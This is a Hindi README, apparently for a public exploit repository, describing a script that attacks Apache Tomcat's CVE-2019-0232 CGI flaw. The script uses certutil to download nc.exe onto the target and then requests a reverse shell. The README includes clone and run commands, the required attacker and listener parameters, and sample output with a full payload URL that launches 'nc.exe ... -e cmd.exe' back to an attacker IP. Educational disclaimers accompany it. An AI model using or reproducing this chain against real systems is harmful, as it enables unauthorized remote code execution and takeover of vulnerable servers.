
नमस्ते, यह CVE-2019-0232 के लिए संशोधित और उन्नत कोड है।
यह स्क्रिप्ट Apache Tomcat में CVE-2019-0232 भेद्यता का शोषण करती है, जो ism.bat स्क्रिप्ट के अनुचित हैंडलिंग के माध्यम से रिमोट कोड निष्पादन की अनुमति देती है। यह स्क्रिप्ट certutil और nc.exe (Netcat) का उपयोग करके रिवर्स शेल तकनीक का लाभ उठाती है ताकि कमजोर सिस्टम तक रिमोट एक्सेस प्राप्त किया जा सके।
ism.bat अनुरोधों के हैंडलिंग में एक भेद्यता है जो हमलावरों को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति दे सकती है। यह भेद्यता उपयोगकर्ता इनपुट के उचित सत्यापन की कमी के कारण होती है, जिससे हमलावर एक विशेष रूप से तैयार अनुरोध के माध्यम से मनमाने कमांड के निष्पादन को ट्रिगर कर सकते हैं।nc.exe फ़ाइल डाउनलोड की जा सकती है और उसका उपयोग रिवर्स शेल उत्पन्न करने के लिए किया जा सकता है।nc.exe) को सर्वर पर होस्ट किया जाना चाहिए।nc.exe डाउनलोड करें: स्क्रिप्ट certutil का उपयोग करके nc.exe (Netcat) फ़ाइल को लक्ष्य मशीन पर डाउनलोड करने के लिए कमजोर Tomcat सर्वर को एक विशेष रूप से तैयार अनुरोध भेजती है।nc.exe डाउनलोड होने के बाद, रिवर्स शेल कमांड निष्पादित करने के लिए एक और अनुरोध भेजा जाता है, जो हमलावर के Netcat लिसनर से वापस जुड़ता है।git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
सफलतापूर्वक निष्पादित होने के बाद, आपके पास अपने Netcat लिसनर से वापस एक रिवर्स शेल कनेक्शन होना चाहिए।
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग दुर्भावनापूर्ण गतिविधियों के लिए न करें। किसी भी पैठ परीक्षण या सुरक्षा ऑडिट का प्रयास करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। इस स्क्रिप्ट के दुरुपयोग के परिणामस्वरूप कानूनी परिणाम हो सकते हैं।
इस एक्सप्लॉइट का उपयोग करने से पहले सुनिश्चित करें कि Apache Tomcat सर्वर CVE-2019-0232 के विरुद्ध पैच नहीं किया गया है। लक्ष्य सिस्टम के कॉन्फ़िगरेशन के आधार पर स्क्रिप्ट को प्रशासनिक विशेषाधिकारों की आवश्यकता हो सकती है।
लेखक: A!Z3N(Dharan) पावर के साथ बनाया गया!
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।
हालांकि, इसे अपने जोखिम पर उपयोग करें। यह कोड केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इस कोड का उपयोग करके, आप इसके उपयोग से उत्पन्न होने वाले किसी भी कार्य की पूरी जिम्मेदारी लेने के लिए सहमत हैं। इस एक्सप्लॉइट का दुरुपयोग या अनधिकृत उपयोग कानूनी परिणामों का कारण बन सकता है। किसी भी सिस्टम पर कोई भी सुरक्षा परीक्षण या पैठ परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
आप इस कोड का उपयोग, संशोधन और वितरण करने के लिए स्वतंत्र हैं, लेकिन केवल नैतिक उद्देश्यों के लिए। इस कोड के कारण होने वाली किसी भी क्षति के लिए लेखक जिम्मेदार नहीं है।
लक्ष्य सिस्टम के स्वामी की स्पष्ट अनुमति के बिना इस एक्सप्लॉइट का उपयोग न करें।